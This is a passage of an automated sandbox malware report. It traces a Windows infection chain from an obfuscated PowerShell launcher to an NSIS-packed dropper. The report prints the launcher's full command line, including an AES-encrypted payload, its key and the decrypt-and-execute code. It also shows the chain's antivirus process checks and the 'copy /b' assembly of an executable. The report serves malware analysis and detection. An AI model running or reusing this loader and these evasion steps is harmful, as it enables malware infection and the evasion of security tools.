Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	09:25:42
Start date:	06/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function AvOq($fZZic){return -split ($fZZic -replace '..', '0x$& ')};$QtEXr = AvOq('F71849245068CFBDCED10C084C6125F88EBB766A68F42618A519AD0E0FA55DFA41BBC0220A7CFC0548D5F0C8ECED91F3F0F6D99831685FEF33B4DEC446D39844DA6ABF150BB86E32B97BCE9734DD73710688BF213151B34198A7EB6F4BF3344166A3DEDC1DACA37BE736FB658BE94E1342E6771A99C5C4C7F81C8B6C9B6279B8D38EAA5AFE0414C8F15D23080FCB04B45D8EBA74D636519B8390011F025A39BC7700FA0681CE70921F7F651441D9609F8C8EAEF66688D0AFF54CD9E186A50129254415DC02D5A4BFE23D7079F563D2111FC83B360CA652CBD54EEA28CDF41EB427FD920B0D520462D045D63090F9624D6DA5E3EF4FFA25772809F9660376473448FC63DF83E3272E1791618E1D0EA5E9D4C40BA1AA89AAE6699A4098C7EE64ECCD62783C1B7D8650592C33F1372AC3509BC676C043FD52F1C6FBBC2010B71345705C84085A96E37CD2B12961AAEEE9DB058ADEF8828940F893309ACF84F8CF8015178D50FF22382C7405F48E91FA3129017B7EC4B284C242676968C97CD62FD0808CB85A7AC9F62C36CC17E1A4E6D6F0E16CD59736713C4F464A5A3A5967451878F4B8F13CEC3CBC042CE205E1628C1D90AD8D743AACF33604780843459139D46877D6B42A0FC19145594EFFEC326A1A0B6326112C4CE5BC279B26783822F68EB2AF9ADADE16BA3D008EEAAB4BF10BA18BA6037C1AFFD5DB8F63AD7ED00193207AA01009443C0AB2F530D584324A1F1D66ED86AD2E61DDF459BCAD3FD5E17C8E7856537300894C18877F3B57C14639BD9781F101D0005E813E71F05721A4EA8B0D052A454533A555B8785235E946B52D496FB71DE15C7BB50F3DCDA385BA2EC195C6AA39504F078B7F5295E4814F28C62055EC0AC8B78A04219E96C739CBED36806D0748376E6BE81C58A52AC85EB33543CE5AEAB7709978EF4CDA0021CBDA1CB44E4400FEF05CA556B0A2E939F422041C9BFFF1639890CF68637888D4ED48E4');$AqvND=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((AvOq('516866484F6B6B4270524E66557A6F4C')),[byte[]]::new(16)).TransformFinalBlock($QtEXr,0,$QtEXr.Length)); & $AqvND.Substring(0,3) $AqvND.Substring(253)
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:25:43
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:25:48
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\IntroductoryTunes.exe"
Imagebase:	0x400000
File size:	1'007'262 bytes
MD5 hash:	12B325F869EA3948FD7ADDBCD59AAC1C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:25:48
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Envelope Envelope.cmd && Envelope.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:25:48
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:25:50
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x4d0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:25:50
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0xd00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:25:50
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x4d0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:25:50
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0xd00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:25:51
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 136140
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	09:25:51
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "DEALERPICRESPONDEDCOURAGEPREREQUISITEOLYMPUSDIAGRAMENGAGED" Sunny
Imagebase:	0xd00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	09:25:52
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Steady + ..\Ts + ..\Unnecessary + ..\Minutes + ..\Silk + ..\Contents + ..\Global d
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	09:25:52
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Local\Temp\136140\Concerts.com
Wow64 process (32bit):	true
Commandline:	Concerts.com d
Imagebase:	0xc50000
File size:	893'608 bytes
MD5 hash:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	09:25:52
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xe30000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FF848B23675 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2090231849.00007FF848B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848b20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 625651b6f288b8a904bcd6d268d7bdaddb07129dccaeb9d83122adbc6e102e1b
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: B501677111CB0C4FDB44EF0CE451AA5B7E0FB99364F50056EE58AC36A1D736E891CB46

Analysis Process: powershell.exePID: 7160, Parent PID: 6660COMMON

Executed Functions

Function 00007FF848B433B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2083446776.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 1e12fb573559a1607474cfd51d5e290bf0fc81e85cc0dd4269b66f17b317570a
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 8B01677115CB0C4FDB44EF0CE451AA5B7E0FB99364F10056DE58AC3691DB36E892CB45

Analysis Process: mshta.exePID: 1088, Parent PID: 7160COMMON

Executed Functions

Function 000001FCDC7F1130 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.2237740670.000001FCDC7F1000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001FCDC7F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_1fcdc7f1000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b6b3c70b24884555d40e2c51b4cc5581f3d67ba4dacf83d67b31f2f1a3c8c42
Instruction ID: bbf2833b7287f55a37a74acaed3eec4a1de102ba8dd21615d399ac314fad832e
Opcode Fuzzy Hash: 0b6b3c70b24884555d40e2c51b4cc5581f3d67ba4dacf83d67b31f2f1a3c8c42
Instruction Fuzzy Hash: C931D23020DA8E4FE795D6F884996B43BE0EB56360F0A41FBC445CB1E1D5184C86D3C2

Function 000001FCDC650F79 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.2237793278.000001FCDC650000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001FCDC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_1fcdc650000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
Instruction ID: 594dc699736f0faa13d5fdbb35cb5fc2c201676511ef91ba1cc8b1b4bcbfe72c
Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
Instruction Fuzzy Hash: DC9002254A580B55D51551D14E452AC50406388250FE444A0881690148D44F429721D2

Function 000001FCDC650FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.2237793278.000001FCDC650000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001FCDC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_1fcdc650000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
Instruction ID: 594dc699736f0faa13d5fdbb35cb5fc2c201676511ef91ba1cc8b1b4bcbfe72c
Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
Instruction Fuzzy Hash: DC9002254A580B55D51551D14E452AC50406388250FE444A0881690148D44F429721D2

Function 000001FCDC650F81 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.2237793278.000001FCDC650000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001FCDC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_1fcdc650000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
Instruction ID: 594dc699736f0faa13d5fdbb35cb5fc2c201676511ef91ba1cc8b1b4bcbfe72c
Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
Instruction Fuzzy Hash: DC9002254A580B55D51551D14E452AC50406388250FE444A0881690148D44F429721D2

Function 000001FCDC650F89 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.2237793278.000001FCDC650000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001FCDC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_1fcdc650000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
Instruction ID: 594dc699736f0faa13d5fdbb35cb5fc2c201676511ef91ba1cc8b1b4bcbfe72c
Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
Instruction Fuzzy Hash: DC9002254A580B55D51551D14E452AC50406388250FE444A0881690148D44F429721D2

Function 000001FCDC650F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.2237793278.000001FCDC650000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001FCDC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_1fcdc650000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
Instruction ID: 594dc699736f0faa13d5fdbb35cb5fc2c201676511ef91ba1cc8b1b4bcbfe72c
Opcode Fuzzy Hash: cccd5e498f1ec33c6c4b63ac2178459b2afe50acbcbd951f51f55e225f12d5ca
Instruction Fuzzy Hash: DC9002254A580B55D51551D14E452AC50406388250FE444A0881690148D44F429721D2

Analysis Process: powershell.exePID: 7056, Parent PID: 1088COMMON

Executed Functions

Function 00007FF8476F370E Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2232588069.00007FF8476F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8476f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063aaf7e750697dabced807482ab12ca9d14e3645d1109c93ab2efedfaa9ee5c
Instruction ID: 714b83ff0108d355fd539308b77efea4dcaa5ee71f3c7e876a2a8a6287111376
Opcode Fuzzy Hash: 063aaf7e750697dabced807482ab12ca9d14e3645d1109c93ab2efedfaa9ee5c
Instruction Fuzzy Hash: 5B61E422E1EE8A9FFFA9AA2D14612BD67D3EF46690B4801BEC01EC71D7DD1C98058351

Function 00007FF8476F375A Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2232588069.00007FF8476F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8476f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50210a618f66551bed9d4fae4f41cadfb7ddfcf947046848d99b03b0cbce5a07
Instruction ID: b6156ff39aa84ac3eeee849bdbfe4252c1bda4ec97c1c66536f23f7ca6a62ad2
Opcode Fuzzy Hash: 50210a618f66551bed9d4fae4f41cadfb7ddfcf947046848d99b03b0cbce5a07
Instruction Fuzzy Hash: B541F322E1EA879FFBAAB62D14652BC67E3EF426D0B8800BAC41DC31D3DD0C9C444301

Function 00007FF8476F3B38 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2232588069.00007FF8476F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8476f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b2af2569a5a928f11d03d6768eed0efb3045797627c1b3f4e83bae78c054ff7
Instruction ID: 06684071a0e5e226970507cb5726d553acae70c2008fe0c19617d289b1098825
Opcode Fuzzy Hash: 3b2af2569a5a928f11d03d6768eed0efb3045797627c1b3f4e83bae78c054ff7
Instruction Fuzzy Hash: 4F01F432F1C80A9FE6A4F61CB4561BD73D3FF947A1B9802B6D40DC318BDE196C024281

Function 00007FF847623A05 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2231879216.00007FF847620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff847620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8607e7f85c2bb2a5020c6518f23c7702bb5abb07c74586bc1031166d3bd47eca
Instruction ID: a22b419a811c58051c0758f19bf03d10d91cd0f770966188d060d37a5126ae36
Opcode Fuzzy Hash: 8607e7f85c2bb2a5020c6518f23c7702bb5abb07c74586bc1031166d3bd47eca
Instruction Fuzzy Hash: 4B01677111CB0C8FDB84EF0CE451AA5B7E0FB95364F10056DE58AC3665D736E882CB46

Function 00007FF8476F04D8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2232588069.00007FF8476F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8476f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68ee7c65a3150da40fad3eaeb54a9aeab10ef4eb5bf7fa255e904827b66258fd
Instruction ID: 69c964afb2f1dd91d0484eb7fde31bae513790c8c34b9a90e4108c46d2ae3cfc
Opcode Fuzzy Hash: 68ee7c65a3150da40fad3eaeb54a9aeab10ef4eb5bf7fa255e904827b66258fd
Instruction Fuzzy Hash: F6E0D833E0D82A5EFFA1B55C25191FC63D2EF546A57441177D91CC3185DC009C144381

Non-executed Functions

Function 00007FF8476F0FB6 Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2232588069.00007FF8476F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8476f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2223fca7f40bf883034854f6f11a619bb93f3c8d0e05f1c1899bae9a37074ba1
Instruction ID: f8c5936b77f86c3f191becbdea16d5b06f5a653f5f0ae8886659392bba0d7326
Opcode Fuzzy Hash: 2223fca7f40bf883034854f6f11a619bb93f3c8d0e05f1c1899bae9a37074ba1
Instruction Fuzzy Hash: 85024A31D0DB8A8FDB9AEB2898555793BE2EF55390B4901FEC04DC7193DE289C46CB41

Function 00007FF847620E45 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2231879216.00007FF847620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff847620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ea0d141d0e7ab302a80e195b2f77d5e6970dc18f537a9990ef73b18d2b2f52a
Instruction ID: e5c797e5e4b46f19e99ec190191423500f740b976d5b39619b2eaf2a979c1da8
Opcode Fuzzy Hash: 4ea0d141d0e7ab302a80e195b2f77d5e6970dc18f537a9990ef73b18d2b2f52a
Instruction Fuzzy Hash: 54517593C0E7C7EEFB96763828A50E92F91EF1269475E05F7C4D84F093DD08684B9222

Analysis Process: IntroductoryTunes.exePID: 3924, Parent PID: 7056COMMON

Execution Graph

Execution Coverage:	17.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.7%
Total number of Nodes:	1482
Total number of Limit Nodes:	25

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424976,759223A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

{, xrefs: 0040537E
New install of "%s" to "%s", xrefs: 004051AE

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

NSIS Error, xrefs: 0040390E
/D=, xrefs: 004039D2
\Temp, xrefs: 00403A47
SeShutdownPrivilege, xrefs: 00403C42
~nsu.tmp, xrefs: 00403B23
Error launching installer, xrefs: 00403AA9
NCRC, xrefs: 004039A8
_?=, xrefs: 00403A90

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
